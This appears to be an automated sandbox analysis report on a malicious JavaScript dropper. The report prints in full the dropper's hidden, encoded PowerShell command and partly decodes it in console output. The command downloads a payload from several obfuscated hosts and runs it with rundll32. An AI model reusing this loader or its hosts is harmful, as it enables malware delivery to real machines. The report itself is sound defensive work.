Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	May 18, 2023, 9:25 a.m.	May 18, 2023, 9:29 a.m.

Size	212.2KB
Type	ASCII text, with very long lines, with CRLF line terminators
MD5	`5e2971bf4b1665562d4977c003f1187e`
SHA256	`9da26f54018ef7b69e7ca172d1ef9d1de643acee030e0b25c66a5f27867c8833`
CRC32	`6CC9A22B`
ssdeep	`3072:nKAZqpXSb48njMNbqCz7oorS5HvhRjjY0WOqtYYQs2Wh:nrqgb48njGt/p4qtYYQs2Wh`
Yara	Admin_Tool_IN_Zero - Admin Tool Sysinternals

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Xpksf.js
3032
- wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Xpksf.js" Aquaphobia araneiformDustheap Denumeral AntipneumococcicNesotragus
  2224
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABCAHIAaQBkAGcAZQBiAG8AYQByAGQAIAA9ACAANwA0ADAAOwAkAGgAbwBtAG8AbAB5AHMAaQBzAE8AYwB0AGEAcgBjAGgAeQAgAD0AIAAzADUAOwAkAEIAcgBlAHQAZQBzAHMAZQBUAGgAZQBtAGUAcgAgAD0AIAAiAFMAeQBuAGMAZQBkACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADsAJAB2AGkAcABlAHIAbwB1AHMARgBpAHIAbQBhAG0AZQBuAHQAYQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBHAEEARwBVAEEAYgBnAEIAdgBBAEgAVQBBAGEAUQBCAHMAQQBHAHcAQQBaAFEAQgAwAEEARgBBAEEAYwBnAEIAbABBAEcAUQBBAGEAUQBCAHoAQQBIAEEAQQBiAHcAQgB1AEEARwBVAEEAYgBnAEIAMABBAEMANABBAGMAZwBCAGwAQQBHAE0AQQBhAFEAQgB3AEEARwBVAEEAYwB3AEEAPQBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AQQBBADMAQQBDADQAQQBNAGcAQQB6AEEARABVAEEATABnAEEAeABBAEQAUQBBAE4AZwBBAHUAQQBEAEUAQQBOAHcAQQB3AEEAQQA9AD0AUABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEUAQQBNAEEAQQB1AEEARABJAEEATQB3AEEAMgBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABFAEEATQBRAEEAPQBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE0AQQBBAHUAQQBEAEkAQQBNAGcAQQAyAEEAQwA0AEEATQBRAEEAeQBBAEQASQBBAEwAZwBBADUAQQBEAGcAQQAiADsAJAB1AG4AYgBsAHUAZgBmAGUAZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAZwBBAEwAZwBBADUAQQBEAEUAQQBMAHcAQgBZAEEARwA0AEEAWgBBAEEAdgBBAEQAWQBBAGEAQQBCAEQAQQBHADQAQQBjAEEAQgBWAEEARwA4AEEAWgBnAEEAPQBuAFUAeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAEkAQQBMAGcAQQAxAEEARABRAEEATAB3AEEANQBBAEUAYwBBAFUAUQBBADEAQQBFAEUAQQBPAEEAQQB2AEEARwAwAEEAYwBBAEIAbgBBAEYAVQBBAFkAZwBCAHAAQQBIAEUAQQBuAFUAeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBPAEEAQQB1AEEARABJAEEATgBRAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABnAEEATQBRAEEAdgBBAEcAMABBAGEAUQBCAFMAQQBDADgAQQBXAGcAQgA1AEEARABFAEEAUQBnAEIARABBAEcATQBBAFYAQQBCAHoAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJAB1AG4AZwBlAG4AdABlAGUAbAB5ACAAaQBuACAAJAB1AG4AYgBsAHUAZgBmAGUAZAAgAC0AcwBwAGwAaQB0ACAAIgBuAFUAeQAiACkAIAB7ACQAUABvAGwAeQBtAGEAdABoAHMAVQBuAGQAZQByAGwAYQBwAHAAaQBuAGcAIAA9ACAAOAAzADcAOwB0AHIAeQAgAHsAJABoAHkAZAByAG8AbAB5AHoAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgAwAEEARwBVAEEAZABBAEIAeQBBAEcARQBBAFkAdwBCAGwAQQBIAEkAQQBkAFEAQgB6AEEARQBRAEEAYQBRAEIAegBBAEgAQQBBAFoAUQBCAHYAQQBIAEEAQQBiAEEAQgBsAEEARwAwAEEAWgBRAEIAdQBBAEgAUQBBAEwAZwBCADAAQQBHADgAQQBiAHcAQgBzAEEASABNAEEASQBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAG8AQQBHAFUAQQBhAFEAQgB5AEEARwBVAEEAWgBBAEIAVABBAEgAVQBBAGMAQQBCAGwAQQBIAEkAQQBjAHcAQgAxAEEARwB3AEEAYwBBAEIAbwBBAEgAVQBBAGMAZwBCAGwAQQBIAFEAQQBMAGcAQgB3AEEARwBrAEEAWQB3AEIAMABBAEgAVQBBAGMAZwBCAGwAQQBIAE0AQQAiADsAJABwAHIAZQBhAGMAYwBvAG0AbQBvAGQAYQB0AGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAdQBuAGcAZQBuAHQAZQBlAGwAeQApACkAOwBpAHcAcgAgACQAcAByAGUAYQBjAGMAbwBtAG0AbwBkAGEAdABlACAALQBPACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVAByAGkAZwBnAGUAcgBmAGkAcwBoAE8AcgBkAG8AdgBpAGEAbgAuAFUAbgBpAGYAbABvAHcAZQByAGUAZAA7ACQAbwByAGQAdQByAG8AdQBzAG4AZQBzAHMAVABvAHAAZQByAGQAbwBtACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBBAEEAMwBBAEMANABBAE0AZwBBAHgAQQBEAGcAQQBMAGcAQQB4AEEARABFAEEATQBnAEEAdQBBAEQARQBBAE0AQQBBADQAQQBBAD0APQB0AGQAWgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAEUAQQBjAGcAQgBqAEEARwBnAEEAWgBRAEIAdQBBAEcATQBBAFoAUQBCAHcAQQBHAGcAQQBZAFEAQgBzAEEARwBrAEEAWQB3AEIASABBAEgASQBBAFkAUQBCAHUAQQBIAFkAQQBhAFEAQgBzAEEARwB3AEEAWgBRAEEAdQBBAEcAVQBBAGIAZwBCAG4AQQBHAGsAQQBiAGcAQgBsAEEARwBVAEEAYwBnAEIAcABBAEcANABBAFoAdwBBAD0AIgA7ACQAYgBvAG8AawBiAGkAbgBkAGUAcgBBAHMAYwBlAHIAdABhAGkAbgBtAGUAbgB0ACAAPQAgACIASABvAGwAbwBzAGkAZABlACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVAByAGkAZwBnAGUAcgBmAGkAcwBoAE8AcgBkAG8AdgBpAGEAbgAuAFUAbgBpAGYAbABvAHcAZQByAGUAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAOAAxADQAMQAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBWAEEAQgB5AEEARwBrAEEAWgB3AEIAbgBBAEcAVQBBAGMAZwBCAG0AQQBHAGsAQQBjAHcAQgBvAEEARQA4AEEAYwBnAEIAawBBAEcAOABBAGQAZwBCAHAAQQBHAEUAQQBiAGcAQQB1AEEARgBVAEEAYgBnAEIAcABBAEcAWQBBAGIAQQBCAHYAQQBIAGMAQQBaAFEAQgB5AEEARwBVAEEAWgBBAEEAcwBBAEUAUQBBAGIAQQBCAHMAQQBGAEkAQQBaAFEAQgBuAEEARwBrAEEAYwB3AEIAMABBAEcAVQBBAGMAZwBCAFQAQQBHAFUAQQBjAGcAQgAyAEEARwBVAEEAYwBnAEEANwBBAEUARQBBAGIAZwBCAG4AQQBIAFUAQQBiAEEAQgBoAEEASABJAEEAIgA7ACQAYQBkAHUAbAB0AGUAcgBpAHoAZQAgAD0AIAA5ADIAMwA7AGIAcgBlAGEAawA7AEEAbgBnAHUAbABhAHIAOwB9AEEAbgBnAHUAbABhAHIAOwB9ACAAYwBhAHQAYwBoACAAewAkAEkAbgB2AGkAZwBvAHIAYQB0AG8AcgAgAD0AIAA5ADcANAA7AH0AfQAkAFUAbgBzAGUAZQBtAGwAeQAgAD0AIAA4ADMAMQA7AEEAbgBnAHUAbABhAHIAOwA="
    2372

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 18, 2023, 9:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2023, 9:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2023, 9:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2023, 9:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 18, 2023, 9:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2023, 9:25 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 18, 2023, 9:25 a.m.			0	0

Command line console output was observed (31 events)

Time & API	Arguments	Status	Return
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: The term 'Angular' is not recognized as the name of a cmdlet, function, script console_handle: 0x00000023	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: file, or operable program. Check the spelling of the name, or if a path was inc console_handle: 0x0000002f	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: luded, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: At line:1 char:1882 console_handle: 0x00000047	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: + $Bridgeboard = 740;$homolysisOctarchy = 35;$BretesseThemer = "Synced";Start-S console_handle: 0x00000053	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: leep -Seconds 7;$viperousFirmamental = "aAB0AHQAcAA6AC8ALwBGAGUAbgBvAHUAaQBsAGw console_handle: 0x0000005f	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: AZQB0AFAAcgBlAGQAaQBzAHAAbwBuAGUAbgB0AC4AcgBlAGMAaQBwAGUAcwA=PaAB0AHQAcABzADoAL console_handle: 0x0000006b	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: wAvADEAMAA3AC4AMgAzADUALgAxADQANgAuADEANwAwAA==PaAB0AHQAcAA6AC8ALwAxADEAMAAuADI console_handle: 0x00000077	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: AMwA2AC4AMgAxADMALgAxADEAMQA=PaAB0AHQAcAA6AC8ALwAxADQAMAAuADIAMgA2AC4AMQAyADIAL console_handle: 0x00000083	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: gA5ADgA";$unbluffed = "aAB0AHQAcAA6AC8ALwAxADQAOQAuADEANQA0AC4AMQA1ADgALgA5ADEA console_handle: 0x0000008f	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: LwBYAG4AZAAvADYAaABDAG4AcABVAG8AZgA=nUyaAB0AHQAcAA6AC8ALwAxADYAMgAuADIANQAyAC4A console_handle: 0x0000009b	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: MQA3ADIALgA1ADQALwA5AEcAUQA1AEEAOAAvAG0AcABnAFUAYgBpAHEAnUyaAB0AHQAcAA6AC8ALwAx console_handle: 0x000000a7	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: ADUAOAAuADIANQA1AC4AMgAxADMALgAxADgAMQAvAG0AaQBSAC8AWgB5ADEAQgBDAGMAVABzAA==";f console_handle: 0x000000b3	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: oreach ($ungenteely in $unbluffed -split "nUy") {$PolymathsUnderlapping = 837;t console_handle: 0x000000bf	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: ry {$hydrolyzed = "aAB0AHQAcAA6AC8ALwB0AGUAdAByAGEAYwBlAHIAdQBzAEQAaQBzAHAAZQBv console_handle: 0x000000cb	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: AHAAbABlAG0AZQBuAHQALgB0AG8AbwBsAHMAIZaAB0AHQAcABzADoALwAvAFUAbgBoAGUAaQByAGUAZ console_handle: 0x000000d7	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: ABTAHUAcABlAHIAcwB1AGwAcABoAHUAcgBlAHQALgBwAGkAYwB0AHUAcgBlAHMA";$preaccommodat console_handle: 0x000000e3	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: e = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64Strin console_handle: 0x000000ef	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: g($ungenteely));iwr $preaccommodate -O C:\ProgramData\TriggerfishOrdovian.Unifl console_handle: 0x000000fb	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: owered;$ordurousnessToperdom = "aAB0AHQAcABzADoALwAvADEAMAA3AC4AMgAxADgALgAxADE console_handle: 0x00000107	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: AMgAuADEAMAA4AA==tdZaAB0AHQAcABzADoALwAvAEEAcgBjAGgAZQBuAGMAZQBwAGgAYQBsAGkAYwB console_handle: 0x00000113	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: HAHIAYQBuAHYAaQBsAGwAZQAuAGUAbgBnAGkAbgBlAGUAcgBpAG4AZwA=";$bookbinderAscertain console_handle: 0x0000011f	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: ment = "Holoside";if ((Get-Item -Path C:\ProgramData\TriggerfishOrdovian.Uniflo console_handle: 0x0000012b	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: wered).Length -ge 181410){powershell -encodedcommand "cwB0AGEAcgB0ACAAcgB1AG4AZ console_handle: 0x00000137	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: ABsAGwAMwAyACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVAByAGkAZwBnAGUAcgBmAGkA console_handle: 0x00000143	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: cwBoAE8AcgBkAG8AdgBpAGEAbgAuAFUAbgBpAGYAbABvAHcAZQByAGUAZAAsAEQAbABsAFIAZQBnAGk console_handle: 0x0000014f	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: AcwB0AGUAcgBTAGUAcgB2AGUAcgA7AEEAbgBnAHUAbABhAHIA";$adulterize = 923;break;Angu console_handle: 0x0000015b	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: lar;}Angular;} catch {$Invigorator = 974;}}$Unseemly = 831;Angular <<<< ; console_handle: 0x00000167	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Angular:String) [], CommandNotF console_handle: 0x00000173	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: oundException console_handle: 0x0000017f	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x0000018b	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005456d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00545418 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00545418 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00545418 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00545018 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00545018 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00545018 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00545018 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00545018 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00545018 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00545618 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00545618 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00545618 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005451d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00545618 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00545618 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00545618 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00545618 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00545618 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00545618 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00545618 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005454d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005454d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005454d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005454d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005454d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005454d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005454d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005454d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005454d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005454d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005454d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005454d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005454d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005454d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544bd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544bd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544bd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544bd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544bd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544bd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544bd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544bd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 18, 2023, 9:25 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 140 events)

Time & API	Arguments	Status
NtProtectVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2224 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x742d2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 1769472 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a30000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ba0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73971000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01eea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73972000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ee2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ef2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ba1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ba2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ef3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
